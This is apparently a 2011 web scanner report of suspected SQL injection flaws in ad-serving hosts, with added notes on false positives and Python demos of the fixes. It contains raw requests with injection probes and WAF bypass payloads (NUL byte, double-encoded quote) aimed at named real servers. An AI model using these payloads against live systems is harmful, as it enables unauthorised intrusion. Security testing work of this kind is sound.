GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d1--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d2--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In this case the two responses shown above are both IIS 404 pages served by different back-end nodes (Server: Microsoft-IIS/6.0, From: N7ADWEB05 for the 1=1 request; Server: Microsoft-IIS/7.5, From: n7adweb02 for the 1=2 request), so the difference between them is explained by the load balancer rather than by the injected condition. Treat it as a likely false positive unless a database error, or a content difference from the same node, can be reproduced.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1402
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... </a> about the error.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc was not found on this server.</p> <hr> <address ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19952419'%20or%201%3d1--%20 and 19952419'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
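The single-quote / double-quote and 1=1 / 1=2 heuristics described above are black-box observations; the following added example (not part of this report, and not code from any of the hosts scanned) reproduces the server side those heuristics are inferring. It uses an in-memory SQLite table with a constructed schema and rows that stand in for an ad server's creative lookup (an assumption; the real schema is not visible in the report). It shows why a concatenated query produces exactly the pattern the scanner looks for (an error on `'`, no error on `''`, a different result set for `' and 1=1--` than for `' and 1=2--`), and why the parameterised version of the same lookup returns the same result for all four probes, which is the behaviour a genuine finding must fail to show.

```python
import sqlite3

# Constructed sample data standing in for an ad server's creative table.
# The real schema is not visible in the report; this is an assumption.
ROWS = [
    ("Procter_Gamble", "Sep_2011", "proc-240x30-0036.gif"),
    ("Procter_Gamble", "Aug_2011", "proc-240x30-0035.gif"),
    ("Acme", "Sep_2011", "acme-300x250.gif"),
]

# The four probes the scanner sends, as suffixes appended to a known-good value.
PROBES = {
    "quote": "'",
    "double_quote": "''",
    "and_1_1": "' and 1=1-- ",
    "and_1_2": "' and 1=2-- ",
}


def make_db():
    """Fresh in-memory database populated with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE creatives(sponsor TEXT, campaign TEXT, file TEXT)")
    db.executemany("INSERT INTO creatives VALUES (?, ?, ?)", ROWS)
    return db


def lookup_unsafe(db, sponsor, campaign):
    """Vulnerable: path segments are concatenated into the SQL text, so a
    quote in `campaign` terminates the literal and the rest becomes SQL."""
    sql = ("SELECT file FROM creatives WHERE sponsor = '" + sponsor +
           "' AND campaign = '" + campaign + "'")
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, sponsor, campaign):
    """Fixed: the query structure is fixed first, the values bound second."""
    sql = "SELECT file FROM creatives WHERE sponsor = ? AND campaign = ?"
    return [row[0] for row in db.execute(sql, (sponsor, campaign))]


def probe(lookup, base_sponsor="Procter_Gamble", base_campaign="Sep_2011"):
    """Replay the scanner's probes against one lookup implementation.

    Returns a dict mapping probe name to either the list of files returned
    or the string "error: <exception class>" when the database raised."""
    db = make_db()
    results = {}
    for name, suffix in PROBES.items():
        try:
            results[name] = lookup(db, base_sponsor, base_campaign + suffix)
        except sqlite3.Error as exc:
            results[name] = "error: " + type(exc).__name__
    return results


def scanner_would_flag(results):
    """The two heuristics from the report applied to one probe run:
    error-based (error on ', gone on '') and difference-based (1=1 vs 1=2)."""
    quote_err = str(results["quote"]).startswith("error")
    dquote_ok = not str(results["double_quote"]).startswith("error")
    return {
        "error_based": quote_err and dquote_ok,
        "difference_based": results["and_1_1"] != results["and_1_2"],
    }


if __name__ == "__main__":
    for label, impl in (("concatenated", lookup_unsafe), ("parameterised", lookup_safe)):
        res = probe(impl)
        print(label, res, scanner_would_flag(res))
```

Against the concatenated lookup the `'` probe raises a database error, `''` does not, and the 1=1 probe returns the sponsor's row while 1=2 returns nothing; the parameterised lookup returns an empty result for all four, so neither heuristic fires. When confirming a scanner finding by hand, that is the contrast to look for: the same node, the same request shape, and a difference that tracks the truth value of the injected condition.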
HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:07:39 GMT
Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error ">http://abc.go.com/error </A>.<BODY></HTML>
The jsv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the jsv request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
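Both bypasses reported on this page, the NULL byte placed before the blocked character and the double-encoded %2527, come from the same mistake: the filter inspects a different string from the one the application finally uses. The following added example (mine, not code from the report or from any of the sites scanned) models that pipeline in Python. A native-style inspection layer reads the once-decoded value as a C string (ctypes.c_char_p.value uses C string semantics and stops at the first NUL byte), then the application URL-decodes a second time; the corrected order canonicalises fully and rejects NUL bytes before any check runs, so the value validated is the value used. The block list and the sample parameter values are illustrative assumptions; parameterised queries remain the actual fix, this only shows why the filter ordering fails.

```python
import ctypes
from urllib.parse import unquote

# Illustrative block list (assumption; the real WAF rules are not in the report).
BLOCKED = ("'", "--", ";")


def native_view(value):
    """How a native-code filter sees a buffer: ctypes.c_char_p.value reads
    with C string semantics, so everything after the first NUL byte vanishes."""
    return ctypes.c_char_p(value.encode("utf-8")).value.decode("utf-8")


def is_blocked(text):
    """Naive signature check over whatever string it is handed."""
    return any(token in text for token in BLOCKED)


def pipeline_weak(raw_param):
    """Order that produces both findings: the web server decodes once, the
    WAF inspects that value as a C string, then the application decodes
    again and uses the result.  Returns (waf_blocked, value_used_by_app)."""
    once = unquote(raw_param)            # web server's single decode
    blocked = is_blocked(native_view(once))
    app_value = unquote(once)            # application's redundant second decode
    return blocked, app_value


def canonicalise(value, max_rounds=3):
    """Decode until the value stops changing, bounded so it cannot loop."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("value still changing after repeated decoding")


def pipeline_fixed(raw_param):
    """Corrected order: canonicalise first, refuse NUL bytes outright, and
    only then validate.  Returns (blocked, value_used_by_app)."""
    value = canonicalise(raw_param)
    if "\x00" in value:
        return True, value
    return is_blocked(value), value


if __name__ == "__main__":
    # Constructed inputs shaped like the two bypass payloads in the report.
    for raw in ("r20110914%2527", "7188170409%00'", "r20110914'", "r20110914"):
        print(repr(raw), "weak:", pipeline_weak(raw), "fixed:", pipeline_fixed(raw))
```

With the weak ordering, `%2527` passes the filter as the literal text `%27` and only becomes `'` inside the application, and `%00'` passes because the native view ends at the NUL byte; the fixed ordering blocks both and still lets the benign value through.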
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 5631
X-XSS-Protection: 1; mode=block
The slotname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the slotname parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00'&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 4567
X-XSS-Protection: 1; mode=block
The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00'&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 5987
X-XSS-Protection: 1; mode=block
Request 2
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00''&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 3806
X-XSS-Protection: 1; mode=block
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The WIDTH_RANGE parameter appears to be vulnerable to SQL injection attacks. The payloads 20440401'%20or%201%3d1--%20 and 20440401'%20or%201%3d2--%20 were each submitted in the WIDTH_RANGE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The response recorded below carries x-internal-error: NO VALID CATEGORY NAME together with x-internal-server: 192.168.212.19 ny-ad9, so at minimum the endpoint leaks internal diagnostics and an internal address to clients; before accepting the response difference as SQL-related, check whether both payloads produced this same rejection header, since a category-name lookup failing at the application layer would explain a difference without any query being altered.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=oNJ8X9wxYWVGdgaZa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
...
1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/detect
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 80156717'%20or%201%3d1--%20 and 80156717'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The only response recorded for this finding, shown below, is a 302 to http://www.google.com/sorry/, which is Google's automated-traffic interstitial; it is triggered by the rate and shape of the scanner's requests, not by a database error, so its appearance and disappearance between two probes does not confirm the finding.
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/sorry/?con ...[SNIP]...
The ktextColor parameter appears to be vulnerable to SQL injection attacks. The payloads 21208523%20or%201%3d1--%20 and 21208523%20or%201%3d2--%20 were each submitted in the ktextColor parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:06 GMT
Content-Length: 1477
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ca request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The cwu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cwu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cwu request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The cxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The dw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the dw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The epid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the epid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The esid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The pb_rtb_ev cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pb_rtb_ev cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
